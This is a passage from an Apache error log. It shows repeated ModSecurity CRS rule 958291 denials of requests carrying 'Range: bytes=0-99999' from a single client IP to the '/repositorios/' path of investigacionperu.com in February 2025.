code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXhLUcx1xj5z0EGUpRqAAAAEQ"] [Mon Feb 17 10:36:36.276823 2025] [:error] [pid 10663:tid 140634199385856] [client 190.102.150.245:36782] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXhLUcx1xj5z0EGUpRqQAAAEo"] [Mon Feb 17 10:36:36.375028 2025] [:error] [pid 10663:tid 140634182600448] [client 190.102.150.245:36784] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXhLUcx1xj5z0EGUpRqgAAAEw"] [Mon Feb 17 10:36:36.472791 2025] [:error] [pid 10663:tid 140634149029632] [client 190.102.150.245:36786] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXhLUcx1xj5z0EGUpRqwAAAFA"] [Mon Feb 17 10:36:36.570627 2025] [:error] [pid 10663:tid 140634140636928] [client 190.102.150.245:36788] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXhLUcx1xj5z0EGUpRrAAAAFE"] [Mon Feb 17 10:36:36.670473 2025] [:error] [pid 10663:tid 140634132244224] [client 190.102.150.245:36790] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXhLUcx1xj5z0EGUpRrQAAAFI"] [Mon Feb 17 10:36:36.769113 2025] [:error] [pid 10663:tid 140634123851520] [client 190.102.150.245:36792] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXhLUcx1xj5z0EGUpRrgAAAFM"] [Mon Feb 17 10:36:36.865708 2025] [:error] [pid 11230:tid 140634132244224] [client 190.102.150.245:36794] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXhKvoDupyaoF2tAuc9gAAANI"] [Mon Feb 17 10:36:36.963541 2025] [:error] [pid 10664:tid 140634165815040] [client 190.102.150.245:36796] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXhAJrayd7JfpBdXs8BwAAAI4"] [Mon Feb 17 10:36:37.061030 2025] [:error] [pid 11230:tid 140634274920192] [client 190.102.150.245:36798] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXhavoDupyaoF2tAuc9wAAAME"] [Mon Feb 17 10:36:37.157367 2025] [:error] [pid 10664:tid 140634216171264] [client 190.102.150.245:36800] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXhQJrayd7JfpBdXs8CAAAAIg"] [Mon Feb 17 10:36:37.254037 2025] [:error] [pid 10664:tid 140634115458816] [client 190.102.150.245:36802] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXhQJrayd7JfpBdXs8CQAAAJQ"] [Mon Feb 17 10:36:37.352318 2025] [:error] [pid 10664:tid 140634249742080] [client 190.102.150.245:36804] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXhQJrayd7JfpBdXs8CgAAAIQ"] [Mon Feb 17 10:36:37.449401 2025] [:error] [pid 11230:tid 140634140636928] [client 190.102.150.245:36806] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXhavoDupyaoF2tAuc-AAAANE"] [Mon Feb 17 10:36:37.545863 2025] [:error] [pid 11230:tid 140634098673408] [client 190.102.150.245:36808] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXhavoDupyaoF2tAuc-QAAANY"] [Mon Feb 17 10:36:37.643513 2025] [:error] [pid 10663:tid 140634098673408] [client 190.102.150.245:36810] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXhbUcx1xj5z0EGUpRrwAAAFY"] [Mon Feb 17 10:36:37.742943 2025] [:error] [pid 10662:tid 140634123851520] [client 190.102.150.245:36812] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXhf_97XY8xax64gWTqAAAABM"] [Mon Feb 17 10:36:37.840105 2025] [:error] [pid 11230:tid 140634157422336] [client 190.102.150.245:36814] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXhavoDupyaoF2tAuc-gAAAM8"] [Mon Feb 17 10:40:22.351467 2025] [:error] [pid 11230:tid 140634174207744] [client 190.102.150.245:38182] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYZqvoDupyaoF2tAuc_wAAAM0"] [Mon Feb 17 10:40:22.448015 2025] [:error] [pid 11230:tid 140634207778560] [client 190.102.150.245:38184] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYZqvoDupyaoF2tAudAAAAAMk"] [Mon Feb 17 10:40:22.545454 2025] [:error] [pid 10663:tid 140634107066112] [client 190.102.150.245:38186] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYZrUcx1xj5z0EGUpRsQAAAFU"] [Mon Feb 17 10:40:22.640797 2025] [:error] [pid 10663:tid 140634266527488] [client 190.102.150.245:38188] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYZrUcx1xj5z0EGUpRsgAAAEI"] [Mon Feb 17 10:40:22.734876 2025] [:error] [pid 10663:tid 140634258134784] [client 190.102.150.245:38190] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYZrUcx1xj5z0EGUpRswAAAEM"] [Mon Feb 17 10:40:22.827170 2025] [:error] [pid 10664:tid 140634354153216] [client 190.102.150.245:38192] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYZgJrayd7JfpBdXs8DgAAAIA"] [Mon Feb 17 10:40:22.922756 2025] [:error] [pid 10664:tid 140634081888000] [client 190.102.150.245:38194] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYZgJrayd7JfpBdXs8DwAAAJg"] [Mon Feb 17 10:40:23.016073 2025] [:error] [pid 10664:tid 140634199385856] [client 190.102.150.245:38196] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYZwJrayd7JfpBdXs8EAAAAIo"] [Mon Feb 17 10:40:23.109060 2025] [:error] [pid 10664:tid 140634182600448] [client 190.102.150.245:38198] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYZwJrayd7JfpBdXs8EQAAAIw"] [Mon Feb 17 10:40:23.204010 2025] [:error] [pid 11230:tid 140634165815040] [client 190.102.150.245:38200] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYZ6voDupyaoF2tAudAQAAAM4"] [Mon Feb 17 10:40:23.307183 2025] [:error] [pid 11230:tid 140634190993152] [client 190.102.150.245:38202] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYZ6voDupyaoF2tAudAgAAAMs"] [Mon Feb 17 10:40:23.404837 2025] [:error] [pid 11230:tid 140634081888000] [client 190.102.150.245:38204] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYZ6voDupyaoF2tAudAwAAANg"] [Mon Feb 17 10:40:23.500745 2025] [:error] [pid 11230:tid 140634232956672] [client 190.102.150.245:38206] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYZ6voDupyaoF2tAudBAAAAMY"] [Mon Feb 17 10:40:23.595652 2025] [:error] [pid 11230:tid 140634258134784] [client 190.102.150.245:38208] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYZ6voDupyaoF2tAudBQAAAMM"] [Mon Feb 17 10:40:23.691970 2025] [:error] [pid 11230:tid 140634115458816] [client 190.102.150.245:38210] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYZ6voDupyaoF2tAudBgAAANQ"] [Mon Feb 17 10:40:23.790352 2025] [:error] [pid 10663:tid 140634274920192] [client 190.102.150.245:38212] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYZ7Ucx1xj5z0EGUpRtAAAAEE"] [Mon Feb 17 10:40:23.883028 2025] [:error] [pid 11230:tid 140634132244224] [client 190.102.150.245:38214] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYZ6voDupyaoF2tAudBwAAANI"] [Mon Feb 17 10:40:23.976956 2025] [:error] [pid 11230:tid 140634274920192] [client 190.102.150.245:38216] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYZ6voDupyaoF2tAudCAAAAME"] [Mon Feb 17 10:40:24.071852 2025] [:error] [pid 11230:tid 140634140636928] [client 190.102.150.245:38218] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYaKvoDupyaoF2tAudCQAAANE"] [Mon Feb 17 10:40:24.168140 2025] [:error] [pid 11230:tid 140634157422336] [client 190.102.150.245:38220] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYaKvoDupyaoF2tAudCgAAAM8"] [Mon Feb 17 10:40:24.262761 2025] [:error] [pid 11230:tid 140634090280704] [client 190.102.150.245:38222] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYaKvoDupyaoF2tAudCwAAANc"] [Mon Feb 17 10:40:24.357217 2025] [:error] [pid 11230:tid 140634241349376] [client 190.102.150.245:38224] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYaKvoDupyaoF2tAudDAAAAMU"] [Mon Feb 17 10:40:24.452098 2025] [:error] [pid 11230:tid 140634199385856] [client 190.102.150.245:38226] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NYaKvoDupyaoF2tAudDQAAAMo"] [Mon Feb 17 10:40:24.547179 2025] [:error] [pid 11230:tid 140634182600448] [client 190.102.150.245:38228] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file 